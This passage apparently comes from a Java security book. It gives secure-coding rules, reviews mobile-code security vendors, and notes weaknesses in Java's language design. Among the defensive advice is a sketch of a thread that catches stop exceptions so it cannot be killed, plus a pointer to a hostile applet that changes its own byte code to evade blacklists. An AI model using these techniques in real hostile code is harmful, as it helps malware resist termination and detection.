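    private int secret = 42;        // intended to stay private

    class Inner {
        int peek() {
            return secret;          // the inner class reads the "private" field
        }
    }
}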
Rule 6: Avoid Signing Your Code Code that is not signed will run without any special privileges. And if your code has no special privileges, then it is much less likely to do damage. Of course, some of your code might have to acquire and use privileges to perform some dangerous operation. Work hard to minimize the amount of privileged code, and audit the privileged code more carefully than the rest.
Rule 7: If You Must Sign Your Code, Put It All in One Archive File The goal of this rule is to prevent an attacker from carrying out a mix-and-match attack in which the attacker constructs a new applet or library that links some of your signed classes together with malicious classes, or links together signed classes that you never meant to be used together. By signing a group of classes together, you make this attack more difficult. Existing code-signing systems do an inadequate job of preventing mix-and-match attacks, so this rule cannot prevent such attacks completely. But using a single archive can't hurt. Some code-signing systems let you examine other classes to see who signed them. If you are using a code-signing system that allows this, you can put code into the static initializers of your classes to verify that the "surrounding" classes have been signed by the same person as expected. Examining signers is one way to avoid the example shown in Figure 7.1. This doesn't completely prevent mix-and-match attacks, since an adversary can still mix together classes that you signed at different times; for example, by mixing version 1 of Class A with version 2 of Class B. If you're worried about this kind of interversion mix-and-match attack, you can put each class's "version stamp" in a public final variable and then have each class check the version stamps of its surrounding classes.
Figure 7.1 A mix and match attack. In one type of mix and match attack, signed code with special privilege is linked or otherwise grouped together with unsigned code. The danger is that the unsigned code will be replaced in the group, leading to undefined and possibly dangerous behavior.
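As a hedged sketch of the version-stamp idea (hypothetical classes A and B that are signed and shipped together), each class can carry a public final stamp and refuse to run with a mismatched partner. The stamps are initialized with a non-constant expression so the compiler cannot inline the values into other classes at compile time, which would silently defeat the runtime check.

public class A {
    public static final int VERSION_STAMP = Integer.parseInt("2");  // bump on each signed release

    static {
        // refuse to run alongside a version of B from a different release
        if (B.VERSION_STAMP != A.VERSION_STAMP) {
            throw new IllegalStateException("A and B come from different releases");
        }
    }
}

class B {
    public static final int VERSION_STAMP = Integer.parseInt("2");
}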
Rule 8: Make Your Classes Uncloneable Java's object-cloning mechanism can allow an attacker to manufacture new instances of classes you define, without executing any of your constructors. Even if your class is not cloneable, the attacker can define a subclass of your class, and make the subclass implement java.lang.Cloneable. This allows the attacker to make new instances of your class. The new instances are made by copying the memory images of existing objects; although this is sometimes an acceptable way to make a new object, it often is not. Rather than worry about this, you're better off making your objects uncloneable. You can do this by defining the following method in each of your classes:

public final Object clone() throws java.lang.CloneNotSupportedException {
    throw new java.lang.CloneNotSupportedException();
}
If you want your class to be cloneable, and you've considered the consequences of that choice, then you can still protect yourself. If you're defining a clone method yourself, make it final. If you're relying on a nonfinal clone method in one of your superclasses, then define this method:

public final Object clone() throws java.lang.CloneNotSupportedException {
    return super.clone();
}
This prevents an attacker from redefining your clone method.
Rule 9: Make Your Classes Unserializeable Serialization is dangerous because it allows adversaries to get their hands on the internal state of your objects. An adversary can serialize one of your objects into a byte array that can be read. This allows the adversary to inspect the full internal state of your object, including any fields you marked private as well as the internal state of any objects you reference. To prevent this, you can make your object impossible to serialize. The way to do this is to declare the writeObject method:

private final void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException {
    throw new java.io.IOException("Object cannot be serialized");
}
This method is declared final so that a subclass defined by the adversary cannot override it.
Rule 10: Make Your Classes Undeserializeable This rule is even more important than the preceding one. Even if your class is not serializeable, it may still be deserializeable. An adversary can create a sequence of bytes that happens to deserialize to an instance of your class. This is dangerous, since you do not have control over what state the deserialized object is in. You can think of deserialization as another kind of public constructor for your object; unfortunately, it is a kind of constructor that is difficult for you to control. You can prevent this kind of attack by making it impossible to deserialize a byte stream into an instance of your class. You can do this by declaring the readObject method:

private final void readObject(java.io.ObjectInputStream in) throws java.io.IOException {
    throw new java.io.IOException("Class cannot be deserialized");
}
As in Rule 9, this method is declared final to prevent the adversary from overriding it.
Rule 11: Don't Compare Classes by Name Sometimes you want to compare the classes of two objects to see whether they are the same, or you want to see whether an object has a particular class. When you do this, you need to be aware that there can be multiple classes with the same name in a JVM. It is a mistake to compare classes by name since different classes can have the same name. A better way is to compare class objects for equality directly. For example, given two objects, a and b, if you want to see whether they are the same class, you should use this code:

if (a.getClass() == b.getClass()) {
    // objects have the same class
} else {
    // objects have different classes
}
You should also be on the lookout for cases of less-direct by-name comparisons. Suppose, for example, you want to see whether an object "has the class Foo." Here is the wrong way to do it:

if (obj.getClass().getName().equals("Foo")) {  // Wrong!
    // object's class is named Foo
} else {
    // object's class has some other name
}

Here is a better way to do it:

if (obj.getClass() == this.getClass().getClassLoader().loadClass("Foo")) {
    // object's class is equal to the class that this class calls "Foo"
} else {
    // object's class is not equal to the class that
    // this class calls "Foo"
}
Note the legalistic comments in the last example. Whenever you use classnames, you are opening yourself
up to mix-and-match attacks, as described in Rule 7. You should also know that the Java language forces you to use classnames all the time: in variable declarations, instanceof expressions, and exception-catching blocks. Only the designers of Java can prevent mix-and-match attacks, but you can avoid making the problem worse by avoiding by-name class comparisons.
Rule 12: Secrets Stored in Your Code Won't Protect You You might be tempted to store secrets such as cryptographic keys in the code for your application or library. Secrets stored in this way are completely accessible to anyone who runs your code. There is nothing to stop a malicious programmer or virtual machine from looking inside your code and learning its secrets. Code obfuscation is another way to store a secret in your code; in the case of obfuscation, the secret is simply the algorithm used by your code. There's not much harm in using an obfuscator, but you shouldn't believe that it provides strong protection. There is no real evidence that it is possible to obfuscate Java source code or byte code so that a dedicated adversary with good tools cannot reverse the obfuscation.
The Take Home Message Writing secure Java code is very difficult. There is no magic bullet that will solve your security problems; all you can do is think hard (perhaps with help from formal analysis tools) and use prudent engineering practices to minimize risks. Sometimes a pair of objective outside eyes can help. The rules set forth here are intended to describe some prudent engineering practices for writing secure Java code. They won't solve your security problems, but they will reduce the number of ways in which things can go wrong.
Java Security Guidelines: Developing and Using Java More Securely
Java security is important to Web users, system administrators, Java developers, and business people. Sun Microsystems and others have worked hard to evolve a Java system with which to create and use more secure code. Java is not immune to security risks, however. As we have seen, designing and implementing a language-based security model is not easy, and mistakes are bound to happen. Given that there is no such thing as a 100-percent secure system (at least if we want that system to do anything useful), how can developers create more secure Java code? And, given that Java developers can't always be counted among the good guys, how can Web users tailor their Web use to be more secure? These are the two major questions this chapter answers. We introduce two sets of guidelines in this chapter: developer guidelines for creating more secure Java code and user guidelines for avoiding risks when using Java. By establishing some simple security guidelines, you can avoid most of the risks discussed throughout this book. Many of the user guidelines have been touched on in other chapters. Here they are consolidated in a complete package. On the other hand, the developer guidelines are completely new material.
Chapter Seven Sections
1. Guidelines for Java Developers
2. Guidelines for Java Users
3. Guidelines Are Never Perfect
Securing Java: Improvements, Solutions, and Snake Oil
Section 6 -- Assess Your Risks
In some sense, the entire purpose of this book is summed up by the phrase "assess your risks." Our goal in writing this book is to make you aware of what is going on with Java security. That way, you can make an intelligent, informed decision about what to do as a user, as a developer, as a manager, or as a business decision-maker. Each organization and individual must create their own strategy for developing, using, and managing Java. The way to do this is to take a long hard look at the risks incurred through Java use. If these risks turn out to be too much to bear, then you should probably reconsider being connected to the Internet itself! Using Java is risky, but really not much more risky than simply being on the Net. Risk assessment involves understanding what it would mean if the data on your machine were made public, what it would mean if your machine were to stop functioning, and what it would mean if the performance of your machine were suddenly and seriously degraded. Risks differ according to context. That means if you have more than one machine (and most organizations do), it is likely that risk assessments for each one differ. An intelligent Java strategy can only be made after understanding what you have to lose. If the answer is "nothing," then there is no reason to worry about Java. If the answer is "the business," then perhaps a more comprehensive Java security policy should be put in place. When you are considering your risks, make sure you don't discount the benefits of Java. Java is an exciting and interesting technology that has lots to offer. Try not to throw out the good with the bad.
Section 5 -- Risks That Third-Party Vendors Can't Address
It seems that there is indeed room for third-party vendors to get involved in the mobile code security business. However, many mobile code security issues cannot be addressed in a trivial manner. In this section, we raise a number of tricky issues that are harder to deal with than they seem at first. Many of these issues are reflected in the questions to ask from the previous section. Keep these points in mind when you are shopping for mobile code solutions.
Identifying Applets Entering the System As we pointed out in 1996, identifying applets is much harder than simply scanning for the <APPLET> tag in port 80 HTTP traffic. The problem of encrypted communication using something like SSL is especially hard to deal with. (Similar problems crop up with encrypted mail that includes mobile code.) The only completely guaranteed way of identifying all mobile code before it runs is by stopping it as it enters the VM. Your browser certainly knows when it encounters a Java applet, and it is probably in the best position to do something about it. From a management perspective, identifying mobile code at the firewall has more appeal than trying to identify it on every desktop in an organization. This is especially true of organizations in which employees do not follow security policy. However, the problem is nontrivial. Ask hard questions about systems that claim to be able to stop all mobile code. Make sure the answers deal with all ports, multiple protocols, and encrypted connections.
Killing Applets Some vendors will tell you that their products allow the user to kill a running applet if it is misbehaving. Although many people are surprised to hear it, there's really no effective way to kill an applet if the applet doesn't want to die. The problem is that the only way to kill a Java thread is to throw an Exception at it, and the thread can simply catch the Exception. See page 125. You might think that this problem can be solved by creating a new kind of Exception that cannot be caught, but that won't solve the problem either. The difficulty is that the try/finally statement in the Java language allows a program to do an arbitrary amount of "cleanup" work before it finishes running. In fact, the "cleanup" code can simply carry on the work of the thread you wanted to kill. An even stronger way to try killing an applet is simply to stop all of the applet's threads, not even letting them execute their cleanup code. This doesn't work either, in general, because the stopped threads may be holding locks, and the VM may be unable to make progress without the locks. Revoking the locks while the victim threads are in the middle of using them only makes things worse, leaving the VM in a potentially inconsistent state. This gets pretty complicated, but the bottom line is that there's no way to safely kill a thread that doesn't want to die. And if an applet thread is trying to cause trouble, why would it willingly let you kill it? Of course, you can stop all running applets by killing the VM or browser entirely, but that's a pretty drastic solution, and you don't need some fancy tool to let you do it.
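A minimal sketch (hypothetical class, not an example from this chapter) shows why throwing an exception at a thread is not enough: the thread can catch anything thrown at it, including the ThreadDeath error produced by Thread.stop(), and its finally block can simply carry on the hostile work.

public class StubbornThread extends Thread {
    public void run() {
        while (true) {
            try {
                doMischief();          // placeholder for the applet's real activity
            } catch (Throwable t) {
                // swallow whatever was thrown at us and keep going
            } finally {
                // "cleanup" code is free to continue the original work here
            }
        }
    }

    private void doMischief() {
        // hypothetical hostile payload
    }
}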
Scanning Applets Java has important dynamic properties. Because of Java's dynamic loading capabilities, it is not possible to statically analyze a Java class completely. Some analysis will always have to be put off until runtime. The fact that the Verifier has a runtime phase is no accident (see Chapter 2). Java's dynamic capabilities do not bode well for systems that claim to be able to scan applets for potentially harmful behavior. After all, if the code is not all there (or if it includes dangling references to not-yet-loaded code), how can you scan it? Static analysis is not sufficient to ensure security, and short of firing up a VM, that's all you can do. Another problem is that scanning works according to the assumption that attack code can be categorized as such. We have seen (or written) plenty of attack code in the lab. It is not the case that this code can be identified as attack code before it does its dirty work. For example, one of the attacks described in Chapter 5 can be written as an applet that carries out seemingly innocuous type-casting operations, one after another. The casting actually implements the important part of a type-confusion attack. Looking at the
code, it would be impossible to tell that the applet is an attack applet. Many of the malicious applets written as demonstrations use very obvious techniques to carry out their hostile activities. For example, early denial-of-service or monitoring applets redefined the stop() method. This does not mean that every applet that redefines stop is malicious, nor does it mean that each and every attack applet will do so. Scanning for unknown malicious behavior is a very difficult task, and in the general case it is theoretically impossible.
Trusted Dialogs and Meters Providing security-related feedback to a user is a good thing, as long as the information is correct. However, if a meter can be spoofed, you can bet that a hostile applet will do so. The spoofing problem may be severe enough that it is best not to have meters. This may in fact be why Sun, Netscape, and Microsoft do not include such feedback mechanisms in their implementations. Ask yourself why you should trust a meter and how you can ensure that it is giving you the correct information.
Improving the VM's Security Model In the end, the most bang for the buck in terms of security will come from Sun and the Java licensees who create the VMs and APIs. Compared to creating a complete VM with added security mechanisms, improving the security situation by adding on minor services is probably nowhere near as effective.
Section 4 -- Risks That Third-Party Vendors Can Address
As we mentioned in the previous section, there are a number of Java security needs that third-party vendors can help to address. We discuss such needs here and also raise some hard questions that you should ask vendors of such products if you're considering buying them. Perhaps counterintuitively, some concerns included in this section are also covered in the next, which discusses risks that can't be easily addressed. That's because the issues are complicated and can be seen equally well from both points of view.
Logging For a discussion of why logging is important, see page 194. The Java platform in most browsers does not do an adequate job of logging mobile code. This is an area in which third-party software can add real value. However, logging is actually trickier than it might appear at first blush.
What to Ask about Logging The main thing to ask of any logging capability is, how well protected is the log file from being overwritten, corrupted, or deleted? Attackers often cover their tracks by editing log files. Attack applets of the sort we discussed in Chapter 5 could certainly change logs if they wanted to. Accuracy is also a big issue for log files. It is important that logs collect proper data and can't be easily misled by a malicious process. If vendors say that their products log all incoming byte code, you should ask how they can be sure. This is roughly the same issue we describe next when we talk about applet isolation. After all, if code can slip past
your firewall, how can you be sure it can't slip past the logging facility?
Applet Isolation (and Identification) A common approach to security for many companies includes the installation of sacrificial lamb machines in a DMZ (terminology borrowed from military speak). Things like Web servers and FTP servers are well-situated in DMZs because they are common targets of attack with many well-known and commonly exploited security holes. The idea is to create a subnetwork behind the firewall but isolated from the rest of your network. That way, if the servers are hacked, your site is still not completely compromised. Isolating untrusted code to a server in the DMZ may be a good idea, depending on your mobile code risk analysis. If mobile code turns out to be hostile and aims an attack at the server it is running on, much less is lost if the server is a sacrificial lamb in the DMZ. Some third-party solutions offer this capability.
What to Ask about Applet Isolation One interesting question to ask vendors of isolation products is, how well do they identify applets in the first place? It turns out that trapping all applets is not an easy problem. Early approaches relying on scanning port 80 traffic for the <APPLET> tag have been shown to be inadequate (something we mentioned in 1996). One of the most thorough treatments of this issue can be found in a paper called Blocking Java Applets at the Firewall [Martin, et al., 1997]. The paper points out problems with standard blocking methods and discusses the technical difficulties of blocking. Another hard question for vendors involves the use of encrypted channels for mobile code delivery. Most browsers have built-in capability to create an SSL connection between the Web server and the client browser (see Chapter 3). Once an SSL connection exists, all traffic between the browser and the server is encrypted. That means a firewall will not be able to parse the traffic as it goes by. What a firewall can't see, it certainly can't identify. Ask vendors what they do about encrypted communication in their identification approach. If they can't scan SSL traffic, they're in trouble because an attacker can defeat their scanner by changing http to https in the attack page's URL.
Black Listing The idea of creating a list of applets known to be hostile seems like a really good idea. The key is to identify hostile applets by something less easy to change than their name or the URL from which they came. Some systems use hashing algorithms like MD5 to create a database of applets on a black list. Others offer the ability to black list entire Web servers.
Assuming applets can be identified in the first place, black listing will work. One problem is that it is almost trivial to make a hostile applet that changes its own byte code (in a very simple way) each time it is requested from a server. Mark LaDue's HAMGen applet does this. See http://www.rstcorp.com/hostileapplets/Rube/HAMGen.java. HAMGen stands for Hostile Applet Mutation Generator.
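To make the hashing idea concrete, here is a hedged sketch (all names hypothetical; real products differ) of a blacklist keyed on an MD5 digest of an applet's class bytes. Note that a single changed byte in the class produces a different digest, which is exactly why this approach is so easy to evade.

import java.security.MessageDigest;
import java.util.HashSet;
import java.util.Set;

public class AppletBlackList {
    private final Set blackListedDigests = new HashSet();  // hex digests of known-bad classes

    public void ban(String hexDigest) {
        blackListedDigests.add(hexDigest);
    }

    public boolean isBanned(byte[] classBytes) throws Exception {
        MessageDigest md5 = MessageDigest.getInstance("MD5");
        return blackListedDigests.contains(toHex(md5.digest(classBytes)));
    }

    private static String toHex(byte[] bytes) {
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < bytes.length; i++) {
            int b = bytes[i] & 0xff;
            if (b < 0x10) sb.append('0');
            sb.append(Integer.toHexString(b));
        }
        return sb.toString();
    }
}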
What to Ask about Black Listing It should be clear that black listing by itself does not provide adequate security; in fact, all by itself, black listing is darn close to useless. It's too easy to make trivial changes in a malicious applet (a process that can be automated at the Web server end) to thwart almost every black-listing scheme. Nevertheless, black listing is so cheap to implement that it may make sense to do it anyway, especially if you enlist the help of a Class Loader. Using a system that blacklists known hostile code may be worthwhile even if it only stops the occasional naïve attack.
Trusted Dialogs and Meters We discussed trusted dialogs and meters earlier in this chapter on page 198. Such dialogs are particularly useful to managers whose policy involves having users keep an eye out for unusual activity. They are also useful to more savvy users who know about mobile code. The problem with most VMs today is that they give no indication that anything special is happening when mobile code is running, be it Java, JavaScript, or ActiveX. The behind-the-scenes approach gives the user a more seamless Web experience, but it makes the job of writing a hostile piece of mobile code that much easier. There is a downside to providing dialogs and meters: the user can become overwhelmed with security-related dialogs, leading to the "cry wolf" phenomenon. It's easy to click OK over and over, especially when you're annoyed. Trusted meters and dialogs should be as nonintrusive as possible.
What to Ask about Trusted Dialogs and Meters A particularly hard question to ask is, how can dialogs and meters avoid the spoofing problem? In other words, how can you be sure that the "meter" you see on the screen is real and isn't really being drawn by a hostile applet? If these things can't be trusted to tell you the truth, then they're not worth the pixels they're made of. Turns out this problem is a tough one. A nontrustworthy meter is potentially worse than no meter at all.
Platform Proliferation
One of the most successful Java marketing phrases is "write once, run anywhere." A number of parodies of this phrase have been floated; among the best is "write once, test everywhere." The problem is that all Java VMs don't always do the same thing given the same byte code. Arbitrary behavior of similar code in different versions of a language is a problem that Java was supposed to solve. This problem can introduce real security risks. Consider, for example, that the attacks described in Chapter 5 still work against old versions of browsers out there. Unless you have an up-to-date browser, you may be surfing dangerously. Now imagine that you are the administrator for a large site with hundreds of users. How likely is it that all your users are using up-to-date browsers? How likely is it that they're even using browsers from a single vendor? Some sites address this problem by mandating the use of a particular (often out-dated) browser; however, impatient power users will download their own free browser and install it themselves. Using a move that mirrors the Applet Isolation idea discussed previously, it is possible to address this risk by forcing all applets to run on a central server. That way, you can guarantee things about the environment in which mobile code will run.
What to Ask about Centralized Server Solutions A big issue for all centralized systems is scalability. How many users can bog down a central server before it chokes? How big a server do you need? What protocol is used to direct GUI traffic between the server and the clients running on normal browsers? How well protected is that protocol against simple denial-of-service attacks? And given the difficulties in detecting incoming applets, how can you be sure that all applets are being redirected to the central server?
Policy Management Finally, we come around to policy management again. Given the state of existing tools, there should be some serious demand for good policy management systems. Note that the management issue is not unique to security. Managing large networks of many machines is a daunting task, and the tools are not yet good enough. Consider the problem of keeping all the software on hundreds of PCs up to date. To some extent this is a problem introduced by the complications of distributed systems. Security is merely one aspect of this broader management problem.
What to Ask about Policy Management Policy management is as much a business management problem as it is a technological problem. Human factors enter the picture, such as, who is allowed to set policy and who can edit it? An excellent goal to strive for is to put in place a site-wide security policy that speaks to all security issues. Much work remains to be done.
Section 3 -- Third-Party Solutions or Snake Oil?
Sun Microsystems and the licensees of Java who have created particular Virtual Machines have done an admirable job implementing a complex, language-based security model. Of course no one is perfect. We discuss several serious problems in detail in Chapter 5. In light of the problems detailed there (a majority of which have been addressed as Java has grown up), is there a need for third-party Java security vendors? The answer is complicated. On one hand, if Sun and the other major vendors (including the largest software organizations on the planet) can't do it right, how can someone else? One answer is that Sun is too busy working on the entire Java platform to pay enough attention to security concerns and that little companies specializing in security can do better. Just for the record, we don't believe that is true. Sun and the other Java vendors behave in a manner that shows they are truly concerned with security issues. On the other hand, different organizations have different goals for their security solutions. Some may demand features that are not included in off-the-shelf Java VMs. The implication is that special-purpose solutions that address particular risks are needed. If that's true, there should be plenty of room in the market for third-party security vendors to get involved. As long as such third-party vendors concentrate on mitigating particular risks, their products will add value. However, many such vendors are making overblown claims about what they can do to enhance security. In this section, we want to clarify which risks can reasonably be addressed by these vendors and which cannot. In order to set the stage for a discussion of risks, we'll begin with a brief introduction to security solutions that have been offered by third-party organizations.
Finjan In the interest of full disclosure, we should note that both authors are members of Finjan's Technical Advisory Board. Our membership on Finjan's TAB does not constitute an endorsement of the company or its products. Originally based in Israel and now headquartered in California, Finjan Software, Ltd. was among the first third-party companies to address mobile code security issues (www.finjan.com). Finjan got off to a rough start when some of its early marketing involved the use of scare tactics and what might be called the "Chicken Little" approach to educating the public (and potential clients) about security risks. Its approach to marketing has since matured significantly. Finjan offers a couple of products created for both Win32 and Unix platforms. The first, SurfinShield, is meant to be a browser-level application firewall. The idea is to add some capabilities to the browser to help with mobile code management. SurfinShield comes in several flavors. The second product, SurfinGate, is a firewall product that attempts to identify and categorize mobile code as it arrives at the firewall. SurfinGate carries out some form of content inspection that attempts to peer into the inner workings of Java applets (statically). SurfinCheck is a less-powerful version of SurfinGate. Finjan has had an interesting time in the mobile code security space and has been the target of some particularly scathing criticism. Mark LaDue is especially outspoken about his concerns (see www.rstcorp.com/hostile-applets/rube.html and www.rstcorp.com/hostile-applets/drowning.html). Fortunately, Finjan has taken these criticisms to heart and seems to be working diligently to provide better security products to its customers.
Digitivity (Citrix) Digitivity, the commercial arm of APM, Ltd. in Cambridge, England, was recently acquired by Citrix. The Digitivity approach to mobile code management is particularly sound from a technical perspective. The idea is to identify and route all mobile code to a central server, where it is then executed. This works because all GUI traffic is sent (by specialized protocol) to be displayed on the client browser that originally requested the code. There are two main reasons to centralize the execution of code like this: 1) to expose only the server, what Digitivity calls the CAGE, to possible attack; and 2) to better manage the behavior of mobile code by knowing the exact configuration of the mobile code platform. As we know, different Java VMs behave differently even when they are running the same byte code. If you know for certain which VM a piece of code will run on, it is easier to develop and manage custom enterprise solutions. There is an inescapable irony to the Digitivity CAGE model. The very idea that spawned mobile code systems like Java is the idea of taking advantage of distributed systems by running code on client
machines instead of running code on something like a centralized Web server. The CAGE model centralizes Java code and works counter to the original Java concept. Still, there are sometimes appealing reasons to centralize the execution of code, whether it is potentially dangerous or not. It is not clear how the CAGE approach will adapt to the new Java 2 security model. The main strength of the CAGE approach is that the mobile code runs on a special machine that simply is not allowed to access user files or initiate network connections under any circumstances. As soon as partially privileged applets enter the picture, this simple approach goes out the window and the CAGE machine faces many of the same problems as existing VMs.
Security7 Security7 is an Israeli company with offices in the United States. U.S. sales for Security7 are based in Woburn, Massachusetts. The Security7 approach to mobile code security is to inspect HTTP traffic coming in on all ports. Its SafeGate product requires Windows NT and is most effectively implemented on a standalone box that acts as a proxy server for all HTTP traffic. The idea is to enhance the existing firewall approach with the HTTP filtering system, which is built in to the OS as a device driver. The SafeGate product includes the usual mobile code management capabilities and logging. It appears that Security7 has been active in spreading FUD (fear, uncertainty, and doubt) among potential customers through an organization called WithinReach. This strategy is reminiscent of the early days of the antivirus industry in which some unscrupulous vendors were rumored to have created and released actual viruses. These days, a code of ethics has been developed within the antivirus community that does not permit the FUD strategy. Unscrupulous antivirus vendors are quickly stamped out by more scrupulous vendors. It is pretty obvious that Security7 and WithinReach are closely affiliated (in fact, Security7 has openly admitted this). Assaf Arkin, a Security7 customer support manager, is also the administrative and technical contact listed in the DNS records of WithinReach. Other evidence includes the fact that one of the hostile applets hosted by WithinReach was signed with a digital certificate registered to Richard Kosinski, Security7's vice president of marketing. The signature has since been changed. InfoWorld broke a story about the relationship between Security7 and WithinReach in late August 1998. Until recently, the WithinReach site hosted a number of hostile applets, including a port of the Cult of the Dead Cow's famous Back Orifice loader to Java. None of the applets on the site exploits any security holes in Java; instead, the applets require permission to be granted by the user in order to do anything harmful. That is, the applets are signed and request special permission to step outside of the sandbox. The applets thus serve to emphasize the role that a human can play in mobile code security. In this sense, the WithinReach applets may provide an interesting service. Nevertheless, we do not believe that it is ethical for third-party security vendors to create security problems for their products to address. Fortunately,
Security7 seems to share our opinion now, and the WithinReach Hostiles have been removed.
eSafe eSafe is a Seattle-based company that also happens to be founded by an Israeli. eSafe offers two products: Protect, a personal firewall, and Protect Gateway, a firewall-level filtering system. Protect works by placing resource limitations on mobile code. The idea is to create a sandbox similar to the Java sandbox within which all mobile code must run. The Protect Gateway product is a filter meant to be added to an existing firewall that scans several protocols for mobile code. The filter includes blacklisting capability. eSafe products also include antivirus capability in addition to addressing mobile code security.
The Princeton Secure Internet Programming Team's JavaFilter The Princeton team distributes a black-listing/white-listing Class Loader for JDK 1.0.2 that can automatically allow or disallow applets to be loaded from particular sites. The filter replaces Java's normal AppletClassLoader with a new implementation that checks URLs and policy before fetching code. Although this is not a commercial product, it is certainly a third-party add-on that some organizations may find useful. See www.cs.princeton.edu/sip/JavaFilter for more information.
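As a rough, hypothetical sketch of the kind of decision such a filtering Class Loader makes (this is not the JavaFilter code itself), the loader consults a site policy before fetching any byte code:

import java.net.URL;
import java.util.HashSet;
import java.util.Set;

public class SiteFilterPolicy {
    private final Set allowedHosts = new HashSet();
    private final Set blockedHosts = new HashSet();

    public void allow(String host) { allowedHosts.add(host); }
    public void block(String host) { blockedHosts.add(host); }

    // A custom Class Loader would call this before fetching an applet's byte code.
    public boolean mayLoadFrom(URL codeBase) {
        String host = codeBase.getHost();
        if (blockedHosts.contains(host)) {
            return false;                     // black-listed site
        }
        return allowedHosts.isEmpty()         // no white list configured...
            || allowedHosts.contains(host);   // ...or the site is white-listed
    }
}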
ICSA's Mobile Code Security Consortium Regardless of its misleading name, the International Computer Security Association is a for-profit business that licenses the use of trademarked "certification" logos. (Perhaps its name is a perfect example of spoofing?!) ICSA was known as NCSA until 1998 when it changed its name from "National" to "International." As part of its business, ICSA creates consortia of security vendors interested in particular issues. The consortia exist to hash out self-imposed certification criteria that can be used as a marketing edge by vendors. ICSA's business strategy is to get vendors to pay to be in a consortium (in which vendors create certification criteria) and then pay to be certified on a subscription basis. Consumer purchasing decisions are often swayed, for whatever reason, by ICSA certification marks. One of ICSA's best-known certification products involves certifying firewalls. The firewall certification system makes an interesting case study. As we understand it, ICSA's firewall certification process boils down to running a penetration test against one instance of a firewall product as configured according to printed instructions from the firewall vendor. If a firewall product passes the tests, the vendor is allowed to place an ICSA certification stamp on its box (and use it in its marketing literature).
A potentially fatal flaw in this firewall certification scheme is that firewalls are not really black-box systems; instead, they are programmable systems that are only as strong as the rules within them defining security policy. Rules in a typical firewall say things like "only allow machines having an IP address within the proper range to send HTTP traffic through port 80." The flaw in the ICSA certification scheme becomes obvious considering that what is being certified is a particular configuration of a firewall. The problem is that firewalls are particularly easy to misconfigure, and the certification scheme says nothing about how difficult it is for an end user of a firewall to configure it correctly. Firewall purchasers may be misled into thinking that buying an ICSA-certified firewall guarantees some minimum level of security. That is not the case. For a stark view of the ICSA firewall certification process, see firewall guru Marcus Ranum's page at www.clark.net/pub/mjr/pubs/fwtest/index.htm. On the flip side of the coin, the firewall certification process that ICSA offers is said to be a discriminator; that is, some firewall products are unable to pass the security tests even when configured according to the instructions! So the certification has at least that benefit to offer. We raise the firewall certification issue because ICSA recently announced the formation of a consortium meant to address mobile code security. Current members of the consortium include Digitivity, eSafe, Finjan, Internet Security Systems, Security7, and Symantec (among others). Strikingly, the major vendors of security-critical platforms for mobile code (Sun, Netscape, and Microsoft) are missing from the list. The question raised earlier in this chapter about what third-party vendors can offer (as opposed to the platform architects) comes to mind. It is likely that the mobile code consortium will choose to invent a set of self-imposed standards (a certification process) for itself. The question to ask is, what will this certification amount to? Developing a certification standard for the mobile code consortium is no easy task if it is to be done properly. Without external review by experts, a mobile code security certification may not actually mean anything. It is our hope that ICSA will take the opportunity to do things right.
Section 2 -- Writing Safer Code: A Defensive Stance
It is all well and good to look to the future and determine what might make a platform stronger, but developers and managers charged with using existing JDKs won't benefit immediately from this strategy. Are there things developers can do now to make their Java code more secure? Fortunately, the answer is yes. Chapter 7 introduces 12 technical guidelines for writing Java code more securely. Also covered in Chapter 7 are user guidelines.
Section 1 -- Improving the Platform
Most problems discussed in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," and Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," involve specific vulnerabilities that have more to do with the current implementation of Java than with the Java security model itself. There are, however, some general concerns raised by the computer security community regarding Java. Many of these concerns are not new; in fact, we wrote about a majority of these issues in 1996. We discuss what progress has been made since then (if any). This section discusses some of these concerns and how addressing them would improve Java security.
Language Issues The first group of issues has to do with the design of Java itself. There are a handful of main language issues to discuss. Note that these are criticisms of the language itself and not criticisms of the current implementation. It may be too late to address these concerns now that the Java ball has been rolling for a couple of years, but these issues still warrant discussion.
Public Variables First among the language concerns is the fact that Java allows a kind of variable called a public variable. These variables can be overwritten by a method from any Java class, no matter where the class may have been defined or from where that class may have been loaded. Storing any data in a public variable introduces a security risk. Public variables are still writable across namespaces. This means that a public variable can be overwritten by an applet that has come across the network. The global nature of public variables opens an entire
avenue of attacks.
Protected Variables A similar concern is raised by protected variables and classes. The real problem is that the label protected implies more security than it may actually offer. Protected variables and classes can be accessed by the class that created them, the creator's subclasses, and classes in the same Java package. Packages are a bit peculiar in Java (something we discuss later in this chapter). The result is that code can declare itself part of a package and gain access to protected variables. Developers should be aware of this risk and use protected variables sparingly.
Packages A third language issue involves Java's package mechanism. Basically, packages in Java are too weak. A variable or method can be declared as accessible to classes within the current package, but there is no alternative way to control what sorts of other classes can access the variable. It would be better to have more explicit control over who can access variables. The flexibility to choose two of these classes, those four, and one from that other package to make up a new package would make the modularity mechanism much more versatile. Consider the following: The java.io.File class is dangerous, and untrusted applets have no business accessing it. However, the same File class is required by code in java.lang.ClassLoader in order for the Class Loader to load classes from the local disk. Since java.io.File is needed outside its package, it must be declared public, making it accessible to applets. But making it public introduces a serious security hole. The hole can be plugged by adding a few rules (some code) to the Security Manager (or the Access Controller, as the case may be). As these parts are built by the browser vendor (or some other Java application writer), such a solution is generally not very reasonable. It would be better to have some way for java.io.File to be accessible to the java.io and java.lang packages, but not to any other code. Doing this would create a stronger package system in Java. In addition, the way membership in a package is declared is somewhat strange in Java. Most languages with package-like modularity use a single file for each module, outlining which code is in the module and who is allowed to access the module. The owner of a module can then easily control who is allowed to use code and variables in the module. In Java, there is no single declaration of a module or a list of members having access to the module. Instead, each class itself declares which package it belongs to. That means that an external mechanism (such as the Security Manager or the Access Controller) must decide whether partially trusted code should be allowed to declare itself a member of a particular package. Because the package system is more complex than it needs to be, there is more room for error than with a more typical setup.
Byte Code Representation
